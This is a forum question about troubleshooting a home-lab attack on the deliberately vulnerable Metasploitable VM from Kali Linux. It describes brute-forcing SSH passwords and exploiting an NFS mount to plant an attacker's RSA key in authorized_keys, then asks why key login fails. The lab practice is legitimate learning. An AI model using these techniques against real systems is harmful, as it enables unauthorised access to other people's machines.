Apologies if the question is really simple, however I have not been able to find a solution yet.
I am exploring the exploitation potential of Kali Linux on the popular Metasploitable vulnerable server. This is done through connecting the two via a NAT Network in Virtualbox.
I have completed a Nessus scan and it revealed that the Metasploitable machine is vulnerable to NFS mounting exploits. I researched this further and it seemed like an easy way to gain password-less access via SSH.
I have already gained access through SSH by brute forcing the password to three accounts (user, postgres and msfadmin), however, I wanted to go a step further and understand how NFS can lead to vulnerabilities.
I followed the steps in this tutorial: https://www.youtube.com/watch?v=i0_t3zl_X_E
I used ssh-keygen
to generate a new RSA key:
I copied the RSA key into Metasploitable's authorized_keys file
I verified that the new key was added on the metasploitable side:
Now I should (according to the video) be able to login via ssh using ssh [email protected] after unmounting the file
I get the following error:
I have researched why this may be happening, and one answer I found was to do with file permissions, or using the command setsebool -P use_nfs_home_dirs 1
I tried using chmod
to change the permissions but this did not work, and ended up breaking the VM at some point (goes to show my lack of understanding, but trying all the different chmod options without a clue as to which one will work might take a long time).
setsebool
didn't work either as i couldn't install the package which it was in using apt-get install policycoreutils
(404 error, try using apt-get update or --fix-missing)
However, clearly I am able to SSH into the system through the use of the cracked passwords, although I still get the same error UNTIL I use the flag -oHostKeyAlgorithms=+ssh-rsa
. Note that this does not work when added to ssh [email protected]
, only when using ssh -oHostKeyAlgorithms+=ssh-rsa [email protected]
Essentially, i want to know why SSH can't recognise that my public key is already in the authorized_keys
file
Many thanks to anyone able to point me in the right direction.